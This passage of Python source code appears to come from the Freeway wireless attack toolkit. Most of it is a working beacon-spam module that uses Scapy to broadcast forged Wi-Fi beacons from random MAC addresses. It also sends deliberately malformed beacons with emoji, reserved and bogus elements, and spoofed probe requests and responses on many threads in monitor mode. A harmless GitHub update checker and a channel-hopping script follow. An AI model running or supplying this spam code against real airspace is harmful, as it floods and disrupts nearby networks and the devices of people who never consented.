        ssid = self.generate_corrupted_ssid()
        self.current_ssid = ssid
    
        smac = random_mac() if self.randmac else self.statmac
        if smac == "":
            """Prevent empty mac"""
            smac = "aa:33:bb:ee:aa:33"
        packet = self.craft_corrupted_beacon_packet(ssid=ssid, src_mac=smac, bssid=smac)
        sendp(packet, iface=interface, count=1, verbose=False)
        self.data["Beacons"] += 1

        if self.verbose:
            self.console.print(f"Sent weird packet with mac {smac}, ssid {ssid}", style="red")

    def craft_corrupted_beacon_packet(self, ssid, src_mac, bssid):
        if random.choice([True, False]):
            # Normal packet
            packet = RadioTap() / Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=src_mac, addr3=bssid) / Dot11Beacon(cap="ESS+privacy")
            packet /= Dot11Elt(ID="SSID", info=ssid)
            packet /= Dot11Elt(ID="Rates", info=b'\x82\x84\x8b\x96\x0c\x12\x18\x24')
            packet /= Dot11Elt(ID="DSset", info=chr(random.randint(1, 14)))
        else:
            # Weird packet
            packet = RadioTap() / Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=src_mac, addr3=bssid) / Dot11Beacon(cap="short-preamble+ESS")
            packet /= Dot11Elt(ID="SSID", info=ssid)
            packet /= Dot11Elt(ID="Rates", info=b'\x96\x82\x84\x0b\x16\x24\x30\x48\x6c')
            packet /= Dot11Elt(ID="Vendor", info="👻👽🤖".encode("utf-8"))  # Emoji in Vendor-specific element
            packet /= Dot11Elt(ID=221, info="♠♠♠♠♠♠♠♠♠♠♠♠♠♠♠♠♠♠")
            packet /= Dot11Elt(ID=42, info=b"\xde\xad\xbe\xef")  # unused/reserved ID
            packet /= Dot11Elt(ID='Country', info=b'XZ\x00\x01\x0b\x1e')  # country code

        return packet

    def send_bframe(self, ssid, interface):
        smac = random_mac() if self.randmac else self.statmac
        if smac == "":
            """Prevent empty mac"""
            smac = "aa:33:bb:ee:aa:33"
        self.current_ssid = ssid
        packet = self.craft_beacon_packet(ssid=ssid, src_mac=smac, bssid=smac)
        sendp(packet, iface=interface, count=1, verbose=False)
        self.data["Beacons"] += 1

        if self.verbose:
            self.console.print(f"Sent packets with mac {smac}, ssid {ssid}", style="green")

    def send_probe_request(self, interface, ssid):
        src_mac = random_mac()
        self.device_mac = src_mac
        radiotap = RadioTap()
        dot11 = Dot11(type=0, subtype=4, addr1="ff:ff:ff:ff:ff:ff", addr2=src_mac, addr3=src_mac)
        probe_req = Dot11ProbeReq()
        ssid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
        packet = radiotap / dot11 / probe_req / ssid
        
        sendp(packet, iface=interface, count=1, verbose=False)
        self.data["Clients"] += 1

        if self.verbose:
            self.console.print(f"Sent probe request packet with mac {src_mac}, ssid {ssid}", style="green")
    
    def send_probe_response(self, interface, ssid):
        src_mac = random_mac()
        dst_mac = self.device_mac if self.device_mac != "" else random_mac()
        radiotap = RadioTap()
        dot11 = Dot11(type=0, subtype=5, addr1=dst_mac, addr2=src_mac, addr3=src_mac)
        probe_resp = Dot11ProbeResp(timestamp=int(time.time()*1000000), beacon_interval=0x0064, cap='ESS+privacy')
        ssid_elt = Dot11Elt(ID='SSID', info=ssid.encode())
        rates_elt = Dot11Elt(ID='Rates', info=b'\x82\x84\x8b\x96\x0c\x12\x18\x24')
        dsset_elt = Dot11Elt(ID='DSset', info=chr(1))
        packet = radiotap / dot11 / probe_resp / ssid_elt / rates_elt / dsset_elt
        
        sendp(packet, iface=interface, count=1, verbose=False)
        self.data["Responses"] += 1
        
        if self.verbose:
            self.console.print(f"Sent probe response packet with mac {src_mac}, ssid {ssid}", style="blue")
    
    def device_emulator(self, interface, ssid_list):
        while not thread_event.is_set():
            try:
            # Randomly select an SSID to associate with
                ssid = random.choice(ssid_list)
                self.send_probe_request(interface, ssid)

                self.send_probe_response(interface, ssid)
            except OSError:
                wprint("Network is down, putting this bastard back up..")

    def craft_beacon_packet(self, ssid, src_mac="12:34:56:78:9a:bc", dst_mac="ff:ff:ff:ff:ff:ff", bssid="12:34:56:78:9a:bc"):
        # Radiotap, Dot11, beacon, and SSID elements
        radiotap = RadioTap()
        dot11 = Dot11(type=0, subtype=8, addr1=dst_mac, addr2=src_mac, addr3=bssid)
        beacon = Dot11Beacon(cap='short-slot+ESS+privacy', beacon_interval=0x64)
        essid = Dot11Elt(ID='SSID', info=ssid.encode('utf-8'))  # Ensure SSID is properly encoded

        # Supported rates (standard rates + some higher rates for compatibility)
        rates = Dot11Elt(ID='Rates', info=b'\x82\x84\x8b\x96\x0c\x12\x18\x24')
        esrates = Dot11Elt(ID='ESRates', info=b'\x30\x48\x60\x6c')  # Extended Supported Rates
        
        # Channel set to a more common one (e.g., channel 1)
        dsset = Dot11Elt(ID='DSset', info=b'\x01')  # Common channel

        # Traffic Indication Map (TIM)
        tim = Dot11Elt(ID='TIM', info=b'\x00\x01\x00\x00')
        
        # ERP Information (Optional, but can help with compatibility)
        erp = Dot11Elt(ID='ERPinfo', info=b'\x00')
        
        # Country information set to PL (Poland)
        country = Dot11Elt(ID='Country', info=b'PL \x00\x01\x0b\x1e')
        
        # RSN Information
        rsn_info = Dot11Elt(ID='RSNinfo', info=(
            b'\x01\x00'              # RSN Version 1
            b'\x00\x0f\xac\x04'      # Group Cipher Suite: AES (CCMP)
            b'\x01\x00'              # 1 Pairwise Cipher Suite
            b'\x00\x0f\xac\x04'      # Pairwise Cipher Suite: AES (CCMP)
            b'\x01\x00'              # 1 Authentication Key Management Suite (AKM)
            b'\x00\x0f\xac\x02'      # AKM Suite: PSK
            b'\xac\x00'              # RSN Capabilities (MFP capable)
        ))

        # Assembling the packet
        packet = radiotap / dot11 / beacon / essid / rates / esrates / dsset / tim / erp / country / rsn_info

        return packet

    def table_view(self):
        table = Table()
        table.add_column("Beacons", style="magenta")  
        table.add_column("Clients", style="green") 
        table.add_column("Total", style="blue")
        table.add_column("SSID", style="yellow", justify="center")

        ssid = self.current_ssid
        beacons = self.data["Beacons"]
        clients = self.data["Clients"]
        responses = self.data["Responses"]
        total = beacons + clients + responses

        table.add_row(str(beacons), str(clients), str(total), str(ssid))
        return table  

    def run_spam(self):
        try:
            thread_event.clear()
            self.init_monitor_mode()
            for interface in self.interface:
                for thread in range(0, int(self.threads)):
                    
                    if self.weird_frames:
                        threading.Thread(target=self.weirdspammer, args=(interface,), daemon=True).start()
                        threading.Thread(target=self.device_emulator, args=(interface, self.random_ssid_list), daemon=True).start()
                    else:
                        threading.Thread(target=self.bspammer, args=(interface,), daemon=True).start()
                        threading.Thread(target=self.device_emulator, args=(interface, self.ssid_list if self.ssid_list else self.random_ssid_list), daemon=True).start()

            live_table = Live(self.table_view(), refresh_per_second=10, console=self.console, transient=True)
            print("")
            with live_table:
                while not thread_event.is_set():
                    live_table.update(self.table_view())
                    time.sleep(1)


        except KeyboardInterrupt:
            thread_event.set()
            time.sleep(1)
        finally:
            self.init_monitor_mode(mode="managed")


import requests
import subprocess
from FreewayTools.colors import *
import time

GITHUB_REPO = "FLOCK4H/Freeway"

def get_latest_version():
    try:
        # This is an API created & hosted by github, not by me, 
        # it's the safest way of checking the most recent version of Freeway

        url = f"https://api.github.com/repos/{GITHUB_REPO}/releases/latest"
        response = requests.get(url)
        response.raise_for_status()
        latest_release = response.json()
        return latest_release["tag_name"]
    except ConnectionError:
        pass
    except Exception as e:
        wprint(str(e))

def get_current_version():
    return "1.2.0"

def update():
    cprint("Checking for updates..")
    
    current_version = get_current_version()
    latest_version = get_latest_version()
    if latest_version is None:
        wprint("You are not connected to any network, I can't fetch updates...")
        time.sleep(0.8)
        return
    
    if current_version != latest_version:
        cprint(f"New version available: {latest_version}")
        if cinput("Update Freeway? (y/n)") == "y":
            subprocess.run(["git", "pull", "origin", "main"], check=True)
            iprint("Update completed. Please restart Freeway.")
    else:
        iprint("You are using the latest version of Freeway.")
    time.sleep(0.8)

if __name__ == "__main__":
    update()


"""
    This script was developed only because the rich live table 
    is introducing weird output to the console when 
    trying to execute any of iwconfig and iw commands.
    Otherwise there is no need for the hopper.py,
    as channel hopping would be implemented into the modules.
"""

import argparse
import subprocess
import time
import sys
import threading

try:
    from FreewayTools.colors import cprint, oneline, iprint, wprint, cinput, ColorCodes

except ModuleNotFoundError:
    from colors import cprint, oneline, iprint, wprint, cinput, ColorCodes

cc = ColorCodes()

def channel_hopper(interface, delay, channels):
    for inf in interface:
        threading.Thread(target=_channel_hopper_thread_, args=(inf, delay, parse_channel_range(channels)), daemon=True).start()
    while True:
        pass

def _channel_hopper_thread_(interface, delay, channels):
    current_index = 0
    while True:
        subprocess.run(["sudo", "iw", "dev", interface, "set", "channel", str(channels[current_index])], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        current_index = (current_index + 1) % len(channels)
        oneline(f"Current channel: {channels[current_index]}", sys)
        time.sleep(delay)


def parse_channel_range(range_str):
    if '-' in range_str:
        start, end = map(int, range_str.split('-'))
        return list(range(start, end + 1))
    else:
        return [int(ch) for ch in range_str.split(',')]

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--interface", required=True, help="Wireless interface to use for channel hopping")
    parser.add_argument("-d", "--delay", type=float, default=0.5, help="Delay (in seconds) between channel hops")
    parser.add_argument("-r", "--range", default="1-11", help="Comma-separated list of channels to hop on or a range e.g. 1-11")
    args = parser.parse_args()

    channel_hopper(list(args.interface), args.delay, args.range)

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        sys.exit(0)